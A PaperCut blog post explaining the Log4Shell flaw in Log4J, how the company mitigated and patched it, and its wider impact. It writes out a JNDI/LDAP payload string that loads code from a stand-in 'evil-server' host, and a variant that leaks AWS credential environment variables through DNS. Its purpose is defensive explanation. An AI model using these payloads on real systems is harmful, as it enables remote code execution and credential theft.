G2 Fall report names PaperCut #1 in Print

Choose your language

Choose your login

Contact us


What is Log4J and how did PaperCut handle it?

First thing, if you haven’t patched some software for Log4shell yet… Do that now. I’ll wait.

Some context around security vulnerabilities

Bugs in commonly used software libraries (reusable packages of code that developers use to make things easier for themselves) are generally amongst the worst vulnerabilities that you can get.

For a couple of reasons. They affect lots of different software vendors and it’s pretty usual for those vendors to find out about the problem when it becomes public.

So patches aren’t usually immediately available for most software. This makes it a race between the software vendor to get fixes in place before attackers leverage it for widespread exploitation, i.e. everyone gets hacked.

Quick history of the Log4Shell exploit

At the end of 2021, Chen Zhaojun, part of the security team at Chinese cloud giant, Alibaba, found a defect in the popular java logging library Log4J. They then disclosed this to the responsible Apache Foundation team. An initial patch was issued for what was going to be Log4Shell or CVE-2021-44228 as it’s more officially known.

The initial disclosure was immediately concerning: if you could get a certain string logged by the Log4J logging library, you could get Remote Code Execution (RCE)— a security term for being able to run a program on someone else’s computer from your hacker lair.

The string was of the format “${jndi:ldap://my.evil-server.com/a}”.

Breaking this down:

  • the ${…} is telling Log4J that it should process whatever is in the brackets specially
  • “jndi:” means use a JNDI lookup
  • “ldap://my.evil-server.com/a” is telling the LDAP JNDI service provider to connect out to an LDAP server and do what that LDAP record says.

JNDI (Java Naming Directory Interface) is a standard interface for Java programs to interact with Directory or Naming services. This allows these programs to do naming or directory lookup using a common framework. Typically LDAP or DNS are used.

LDAP (for those that don’t know) stands for Lightweight Directory Access Protocol. It is generally used for looking up users in an organization but can be used for any kind of directory services. The JNDI LDAP provider has the functionality for the LDAP server to return a record that instructs the JNDI to download a class file and load it. There is a blackhat presentation that shows why this is a bad thing.

To recap, the logging library processed log messages to allow lookups that could cause the application to reach out via LDAP for information on where to get an attacker-controlled Java class from and load it.

So we have two really concerning attributes:

  • a) the logging library is parsing log messages for special commands
  • b) we have a naming lookup that will download and run random code from some computer somewhere.

This is really bad. So bad it got a CVSS (Common Vulnerability Scoring System) score of 10 out of 10.

What makes it worse is that getting a web application to log a string is usually trivial to do but often all over the place. In fact, some security researchers were getting “hits” on their test attacks hours later as the content was presumably processed by backend systems.

How did PaperCut respond to Log4J?

In this situation, the first thing you want to know is, “Do we use this library? Do we use it in a way that exposes the vulnerability?” The answer for us was a very simple yes.

The next question you have to ask is, “What do I tell my customers to do right now to make them safe?” This is a key question with critical severity bugs. It’s likely that you may not be able to deliver a patch quickly enough to ensure the safety of your customers before someone starts trying to drop cryptominers on systems.

Luckily, with this one, there was a configuration option that enabled people to disable the most problematic aspects of the issue. Our lead developer was already testing that when I walked over to talk about it. So we put that out as a known issue within a couple of hours of the start of the investigation. We then quickly created a standalone page to track our efforts on the issue complete with a timeline for updates and an FAQ section.

Next of course was the patch. We bumped the version and ran it through testing, then bumped the version again when a new Log4J was released. We then pushed out a patch and alerted our channel to it so they could help their customers.

All done and finished, you would think? Well, no. High-profile security vulnerabilities in software libraries have a lifecycle to them. They start with the initial bug being announced and then all the security researchers flock to the library to find new vulnerabilities or bypasses for the original fix.

This inevitably means that further issues will come up and need to be addressed. For Log4Shell, this meant that at least another issue was found and another iteration of the patch needed to be released. There were also issues found in the older version of Log4j and this was causing some concern due to the messages in some vulnerability scanners.

While the issue exists in the older version of Log4j, it’s generally less of a problem. This is because the original problem was in interpreting the log messages themselves. In the older version of log4j, you had to be able to alter the configuration of the logger. This typically meant you had to be able to overwrite a file on the server running the application. If you can do that you can also find a bunch of other files to overwrite to compromise the server.

Going forward we are planning on updating our software to remove the dependency on the old version of log4j to remove these issues.

The wider impact of Log4Shell

This could have been a lot worse. If the initial bug had been in the old version of log4j it would have been very bad. One estimate is that there is 10 times the usage of the older version than the new one. It’s also not trivial to go from the older version to the new one, potentially requiring code changes in the application rather than just bumping up to the latest library version and running testing.

Also, a lot of enterprise networks have egress filtering on their networks. So random Java apps making outbound LDAP calls are likely to be blocked. This limits the effectiveness of the remote code execution part of the issue.

There could not have been a configuration-based mitigation, i.e. if you needed to patch to prevent exploitation then as a product provider you have to ask yourself, “Do we recommend that our customers turn our software off?” This is a last resort and nothing a company wants to tell customers.

Hacking Java apps like this are not generally in the workflow of your commodity attackers, ransomware crews, etcetera. Cobalt Strike doesn’t come with a hack Linux button (though someone has apparently been working on it). This means that exploitation requires more effort and doesn’t always have a clear path to getting Domain Admin, which is generally the goal. This said, attacks against specific applications are likely to increase, so the danger is going to be in the applications that use Log4j which haven’t been patched.

Exposing credentials via this issue is probably going to be more of a headache for organizations that haven’t patched the software. With a lot of applications being migrated to the cloud and having credentials set via environment variables, you can leverage this vulnerability to extract them.  A string like ${jdni:ldap://${env:AWS_ACCESS_KEY_ID}.${env:AWS_SECRET_ACCESS_KEY}.my.evil-server.com/a} would expose the access credentials for an AWS account, and not via the LDAP request, but rather the DNS resolution that happens before it. This is likely to get around some egress routing controls.

All of this means I expect this to have a longish tail and certainly be a problem for quite a while causing issues in new and “fun” ways.